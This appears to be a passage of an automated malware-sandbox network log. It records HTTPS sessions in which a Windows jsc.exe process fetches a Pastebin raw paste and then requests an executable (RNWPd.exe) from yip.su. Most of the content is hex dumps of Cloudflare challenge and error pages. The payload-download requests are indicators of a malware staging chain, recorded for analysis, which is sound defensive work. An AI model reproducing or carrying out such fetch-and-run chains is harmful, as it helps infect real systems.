                                    2024-08-17 22:08:47 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:47 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:47 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:47 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:47 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:47 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:47 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 38 38 31 32 30 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 63 31 36 36 64 66 35 34 32 35 39 27 2c 63 48 61 73 68 3a 20 27 65 32 37 32 32 33 31 30 37 36 64 34 37 37 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 45 62 56 6b 6b 72 49 42 51 76 77 33 63 4c 45 46 61 62 76 70 59 6c 5a 78 67 4e 51 51 2e 7a 6b 71 48 6f 73 39 64 71 6d 48 41 6d 55 2d 31 37 32 33 39 33 32 35 32 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '88120',cRay: '8b4cfc166df54259',cHash: 'e272231076d4779',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=EbVkkrIBQvw3cLEFabvpYlZxgNQQ.zkqHos9dqmHAmU-1723932527-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:47 UTC1369INData Raw: 50 63 70 37 71 2e 48 4a 72 7a 62 69 68 56 5f 6d 41 65 79 6b 6c 61 49 7a 69 6c 46 69 52 6d 6b 45 74 78 71 37 44 39 35 6b 34 6c 35 67 6a 67 36 4c 65 4a 76 50 53 59 33 49 7a 65 75 58 65 51 33 54 68 4b 2e 69 78 34 6c 6a 45 54 30 32 68 64 67 4f 38 65 49 57 42 55 63 53 50 51 55 59 33 57 67 77 63 59 74 65 78 41 45 62 45 46 67 7a 6a 4a 39 62 43 4d 73 78 6d 51 72 4f 73 51 64 32 4f 31 7a 6e 37 66 44 5a 68 67 39 48 47 51 6f 52 64 63 77 56 44 52 74 61 49 4b 6a 35 71 79 62 4b 76 66 30 74 65 7a 77 5a 49 6f 71 5f 34 76 48 5a 59 57 7a 4c 56 6b 54 45 39 33 62 71 45 52 52 71 74 54 6b 2e 35 41 33 6d 59 32 6c 51 6f 61 30 4d 35 6a 6d 38 6d 51 4b 79 4e 78 7a 4d 66 6e 56 67 71 38 5a 41 45 75 37 70 34 52 41 44 57 66 42 50 62 62 47 6a 66 4c 6e 7a 58 6f 66 6f 54 7a 72 61 33 76 49
                                    Data Ascii: Pcp7q.HJrzbihV_mAeyklaIzilFiRmkEtxq7D95k4l5gjg6LeJvPSY3IzeuXeQ3ThK.ix4ljET02hdgO8eIWBUcSPQUY3WgwcYtexAEbEFgzjJ9bCMsxmQrOsQd2O1zn7fDZhg9HGQoRdcwVDRtaIKj5qybKvf0tezwZIoq_4vHZYWzLVkTE93bqERRqtTk.5A3mY2lQoa0M5jm8mQKyNxzMfnVgq8ZAEu7p4RADWfBPbbGjfLnzXofoTzra3vI


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.549738104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:51 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:51 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfc325f1f439f-EWR
                                    2024-08-17 22:08:51 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:51 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:51 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:51 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.549739188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:52 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:52 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:52 UTC683INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 78 79 4b 4e 53 48 32 56 32 6e 4f 4c 45 48 30 79 59 62 6b 6e 6a 6d 4d 76 63 6d 32 62 6d 79 75 4d 4d 36 36 2f 56 69 37 45 37 6e 32 79 52 61 7a 64 64 35 39 67 72 46 48 76 58 33 68 69 4b 4b 33 70 36 34 75 7a 68 55 43 41 37 75 66 54 54 35 71 39 44 49 36 35 41 36 4a 61 6b 4a 62 67 55 42 38 49 63 75 31 78 52 52 64 4a 78 4b 77 3d 24 4a 52 44 7a 32 74 30 31 4c 36 47 30 49 47 69 77 6c 77 78 52 68 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: xyKNSH2V2nOLEH0yYbknjmMvcm2bmyuMM66/Vi7E7n2yRazdd59grFHvX3hiKK3p64uzhUCA7ufTT5q9DI65A6JakJbgUB8Icu1xRRdJxKw=$JRDz2t01L6G0IGiwlwxRhg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:52 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:52 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:52 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:52 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
